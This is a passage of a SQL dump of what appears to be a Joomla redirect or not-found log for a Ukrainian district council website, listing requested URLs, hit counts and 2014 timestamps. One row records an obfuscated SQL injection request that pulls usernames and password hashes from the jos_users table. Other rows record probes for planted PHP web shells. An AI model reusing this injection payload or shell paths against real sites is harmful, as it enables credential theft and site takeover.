00:00:00',301),(7062,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-06 14:50:20','0000-00-00 00:00:00',301),(7063,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:--lr----&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-06 14:50:25','0000-00-00 00:00:00',301),(7064,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1025:-2011-2015-&catid=51&Itemid=92&lang=en','','','',2,0,'2014-10-06 14:50:30','0000-00-00 00:00:00',301),(7065,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-06 14:53:56','0000-00-00 00:00:00',301),(7066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-06 14:54:24','0000-00-00 00:00:00',301),(7067,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-06 14:54:47','0000-00-00 00:00:00',301),(7068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-06 14:54:52','0000-00-00 00:00:00',301),(7069,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-06 14:54:55','0000-00-00 00:00:00',301),(7070,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=en&Itemid=','','','',1,0,'2014-10-06 14:54:57','0000-00-00 00:00:00',301),(7071,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 14:55:21','0000-00-00 00:00:00',301),(7072,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-10-06 14:55:23','0000-00-00 00:00:00',301),(7073,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59:--20062014-&Itemid=107&lang=ru','','','',12,0,'2014-10-06 14:55:24','0000-00-00 00:00:00',301),(7074,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 14:55:26','0000-00-00 00:00:00',301),(7075,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 14:55:28','0000-00-00 00:00:00',301),(7076,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 14:55:29','0000-00-00 00:00:00',301),(7077,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=947:-lr-2012-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-06 14:58:07','0000-00-00 00:00:00',301),(7078,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=uk','','','',2,0,'2014-10-06 14:58:18','0000-00-00 00:00:00',301),(7079,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=ru','','','',3,0,'2014-10-06 14:59:46','0000-00-00 00:00:00',301),(7080,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 15:01:13','0000-00-00 00:00:00',301),(7081,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-06 15:01:19','0000-00-00 00:00:00',301),(7082,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-06 15:01:56','0000-00-00 00:00:00',301),(7083,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-06 15:02:06','0000-00-00 00:00:00',301),(7084,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=32&lang=ru&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 15:06:59','0000-00-00 00:00:00',301),(7085,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-06 15:09:43','0000-00-00 00:00:00',301),(7086,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 15:09:54','0000-00-00 00:00:00',301),(7087,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-06 15:10:06','0000-00-00 00:00:00',301),(7088,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1156:2013-12-09-07-12-03&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-10-06 15:11:47','0000-00-00 00:00:00',301),(7089,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 15:11:59','0000-00-00 00:00:00',301),(7090,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:-3110&catid=59&Itemid=107&lang=ru','','','',4,0,'2014-10-06 15:12:32','0000-00-00 00:00:00',301),(7091,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 15:14:17','0000-00-00 00:00:00',301),(7092,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 15:16:20','0000-00-00 00:00:00',301),(7093,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-06 15:16:29','0000-00-00 00:00:00',301),(7094,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-06 15:18:26','0000-00-00 00:00:00',301),(7095,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-06 15:18:32','0000-00-00 00:00:00',301),(7096,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-06 15:18:44','0000-00-00 00:00:00',301),(7097,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=0&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 15:21:58','0000-00-00 00:00:00',301),(7098,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 15:24:48','0000-00-00 00:00:00',301),(7099,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-06 15:28:27','0000-00-00 00:00:00',301),(7100,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 15:31:08','0000-00-00 00:00:00',301),(7101,'http://www.malyn-rayrada.org.ua/2013/components/com_community/index.html','','','',1,0,'2014-10-06 15:32:03','0000-00-00 00:00:00',301),(7102,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 15:34:29','0000-00-00 00:00:00',301),(7103,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-06 15:35:28','0000-00-00 00:00:00',301),(7104,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 15:36:17','0000-00-00 00:00:00',301),(7105,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=32&lang=uk&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 15:37:57','0000-00-00 00:00:00',301),(7106,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1185:2014-01-28-09-38-54&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-06 15:39:16','0000-00-00 00:00:00',301),(7107,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=uk&Itemid=','','','',3,0,'2014-10-06 15:40:23','0000-00-00 00:00:00',301),(7108,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 15:44:23','0000-00-00 00:00:00',301),(7109,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-06 15:45:08','0000-00-00 00:00:00',301),(7110,'http://www.malyn-rayrada.org.ua/index.php?id=1&Itemid=32&lang=en&option=com_phocagallery&view=category','','','',4,0,'2014-10-06 15:45:30','0000-00-00 00:00:00',301),(7111,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-06 15:45:38','0000-00-00 00:00:00',301),(7112,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=1&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 15:45:48','0000-00-00 00:00:00',301),(7113,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=32&lang=uk&option=com_phocagallery&view=category','','','',3,0,'2014-10-06 15:46:01','0000-00-00 00:00:00',301),(7114,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=0&lang=ru&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 15:46:21','0000-00-00 00:00:00',301),(7115,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 15:46:25','0000-00-00 00:00:00',301),(7116,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=0&lang=ru&option=com_phocagallery&view=category','','','',2,0,'2014-10-06 15:46:29','0000-00-00 00:00:00',301),(7117,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-06 15:46:30','0000-00-00 00:00:00',301),(7118,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=32&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 15:46:35','0000-00-00 00:00:00',301),(7119,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-06 15:47:10','0000-00-00 00:00:00',301),(7120,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 15:48:33','0000-00-00 00:00:00',301),(7121,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=en','','','',6,0,'2014-10-06 15:49:52','0000-00-00 00:00:00',301),(7122,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-06 15:53:44','0000-00-00 00:00:00',301),(7123,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=ru','','','',2,0,'2014-10-06 15:55:23','0000-00-00 00:00:00',301),(7124,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=uk&Itemid=','','','',4,0,'2014-10-06 16:00:19','0000-00-00 00:00:00',301),(7125,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 16:01:10','0000-00-00 00:00:00',301),(7126,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=uk','','','',2,0,'2014-10-06 16:04:27','0000-00-00 00:00:00',301),(7127,'http://www.malyn-rayrada.org.ua/samba/components/com_community/index.html','','','',2,0,'2014-10-06 16:06:00','0000-00-00 00:00:00',301),(7128,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=uk','','','',2,0,'2014-10-06 16:10:31','0000-00-00 00:00:00',301),(7129,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1127:2013-11-05-12-58-04&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 16:16:44','0000-00-00 00:00:00',301),(7130,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1157:-11-2013-&catid=11&lang=uk','','','',4,0,'2014-10-06 16:16:51','0000-00-00 00:00:00',301),(7131,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 16:18:21','0000-00-00 00:00:00',301),(7132,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=32&lang=en&option=com_phocagallery&view=category','','','',3,0,'2014-10-06 16:24:55','0000-00-00 00:00:00',301),(7133,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=en','','','',2,0,'2014-10-06 16:25:31','0000-00-00 00:00:00',301),(7134,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=en','','','',2,0,'2014-10-06 16:25:35','0000-00-00 00:00:00',301),(7135,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 16:25:58','0000-00-00 00:00:00',301),(7136,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 16:27:34','0000-00-00 00:00:00',301),(7137,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 16:30:29','0000-00-00 00:00:00',301),(7138,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 16:30:36','0000-00-00 00:00:00',301),(7139,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=en&Itemid=0','','','',5,0,'2014-10-06 16:30:39','0000-00-00 00:00:00',301),(7140,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 16:31:52','0000-00-00 00:00:00',301),(7141,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 16:33:04','0000-00-00 00:00:00',301),(7142,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 16:35:09','0000-00-00 00:00:00',301),(7143,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 16:35:15','0000-00-00 00:00:00',301),(7144,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 16:39:22','0000-00-00 00:00:00',301),(7145,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 16:42:13','0000-00-00 00:00:00',301),(7146,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 16:42:43','0000-00-00 00:00:00',301),(7147,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 16:42:47','0000-00-00 00:00:00',301),(7148,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 16:42:50','0000-00-00 00:00:00',301),(7149,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 16:42:51','0000-00-00 00:00:00',301),(7150,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&lang=uk&option=com_phocagallery&view=categories','','','',2,0,'2014-10-06 16:44:40','0000-00-00 00:00:00',301),(7151,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=en','','','',3,0,'2014-10-06 16:49:22','0000-00-00 00:00:00',301),(7152,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=en','','','',2,0,'2014-10-06 16:50:05','0000-00-00 00:00:00',301),(7153,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-06 16:50:06','0000-00-00 00:00:00',301),(7154,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-06 16:53:33','0000-00-00 00:00:00',301),(7155,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-06 16:58:46','0000-00-00 00:00:00',301),(7156,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 16:59:07','0000-00-00 00:00:00',301),(7157,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=ru','','','',7,0,'2014-10-06 16:59:09','0000-00-00 00:00:00',301),(7158,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 16:59:15','0000-00-00 00:00:00',301),(7159,'http://www.malyn-rayrada.org.ua/index.php?id=3&Itemid=1&lang=uk&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 16:59:27','0000-00-00 00:00:00',301),(7160,'http://www.malyn-rayrada.org.ua/index.php?id=2&Itemid=1&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 16:59:54','0000-00-00 00:00:00',301),(7161,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=32&lang=en&option=com_phocagallery&view=category','','','',1,0,'2014-10-06 17:00:41','0000-00-00 00:00:00',301),(7162,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=uk','','','',2,0,'2014-10-06 17:00:56','0000-00-00 00:00:00',301),(7163,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-06 17:06:59','0000-00-00 00:00:00',301),(7164,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-06 17:14:38','0000-00-00 00:00:00',301),(7165,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=uk','','','',4,0,'2014-10-06 17:16:12','0000-00-00 00:00:00',301),(7166,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-06 17:18:31','0000-00-00 00:00:00',301),(7167,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-06 17:22:29','0000-00-00 00:00:00',301),(7168,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1004:2013-05-04-11-41-00&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-06 17:22:35','0000-00-00 00:00:00',301),(7169,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=ru','','','',5,0,'2014-10-06 17:23:24','0000-00-00 00:00:00',301),(7170,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-06 17:27:13','0000-00-00 00:00:00',301),(7171,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=uk','','','',2,0,'2014-10-06 17:27:33','0000-00-00 00:00:00',301),(7172,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 17:29:08','0000-00-00 00:00:00',301),(7173,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-06 17:29:52','0000-00-00 00:00:00',301),(7174,'http://malyn-rayrada.org.ua/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',8,0,'2014-10-06 17:30:34','0000-00-00 00:00:00',301),(7175,'http://www.malyn-rayrada.org.ua/images/stories/magic.php?baca','','','',6,0,'2014-10-06 17:32:04','0000-00-00 00:00:00',301),(7176,'http://www.malyn-rayrada.org.ua/images/stories/gibran.php?rf','','','',1,0,'2014-10-06 17:32:21','0000-00-00 00:00:00',301),(7177,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',13,0,'2014-10-06 17:33:21','0000-00-00 00:00:00',301),(7178,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1249:2014-03-24-06-41-46&catid=36&Itemid=70&lang=en','','','',8,0,'2014-10-06 17:34:24','0000-00-00 00:00:00',301),(7179,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=ru','','','',2,0,'2014-10-06 17:35:24','0000-00-00 00:00:00',301),(7180,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-10-06 17:37:47','0000-00-00 00:00:00',301),(7181,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-10-06 17:37:52','0000-00-00 00:00:00',301),(7182,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:-21022013-&Itemid=86&lang=en','','','',3,0,'2014-10-06 17:37:56','0000-00-00 00:00:00',301),(7183,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56&Itemid=97&lang=en','','','',2,0,'2014-10-06 17:38:09','0000-00-00 00:00:00',301),(7184,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-06 17:42:53','0000-00-00 00:00:00',301),(7185,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=uk','','','',2,0,'2014-10-06 17:44:49','0000-00-00 00:00:00',301),(7186,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1024:-l-2011-2014-r-&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-10-06 17:47:06','0000-00-00 00:00:00',301),(7187,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=ru&Itemid=','','','',5,0,'2014-10-06 17:51:48','0000-00-00 00:00:00',301),(7188,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-------&catid=11&Itemid=14&lang=en','','','',1,0,'2014-10-06 17:54:30','0000-00-00 00:00:00',301),(7189,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-06 17:54:31','0000-00-00 00:00:00',301),(7190,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-06 17:57:27','0000-00-00 00:00:00',301),(7191,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=uk&Itemid=','','','',3,0,'2014-10-06 18:00:49','0000-00-00 00:00:00',301),(7192,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53&Itemid=94&lang=en','','','',2,0,'2014-10-06 18:02:01','0000-00-00 00:00:00',301),(7193,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=uk','','','',2,0,'2014-10-06 18:04:14','0000-00-00 00:00:00',301),(7194,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:-14-2012-340-l-2012-2013-&catid=47:--21022013-&Itemid=86&lang=en','','','',6,0,'2014-10-06 18:06:51','0000-00-00 00:00:00',301),(7195,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-10-06 18:08:26','0000-00-00 00:00:00',301),(7196,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-10-06 18:11:01','0000-00-00 00:00:00',301),(7197,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-06 18:16:30','0000-00-00 00:00:00',301),(7198,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=uk&Itemid=0','','','',5,0,'2014-10-06 18:19:39','0000-00-00 00:00:00',301),(7199,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:--------14--2012--340-l---------2012-2013-------------&catid=36&Itemid=70&lang=en','','','',2,0,'2014-10-06 18:22:24','0000-00-00 00:00:00',301),(7200,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',3,0,'2014-10-06 18:23:33','0000-00-00 00:00:00',301),(7201,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-06 18:27:16','0000-00-00 00:00:00',301),(7202,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1166:2014-01-06-08-21-04&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-06 18:28:17','0000-00-00 00:00:00',301),(7203,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-06 18:32:40','0000-00-00 00:00:00',301),(7204,'http://malyn-rayrada.org.ua/home/components/com_community/index.html','','','',2,0,'2014-10-06 18:37:35','0000-00-00 00:00:00',301),(7205,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-06 18:39:30','0000-00-00 00:00:00',301),(7206,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=uk&Itemid=0','','','',9,0,'2014-10-06 18:43:40','0000-00-00 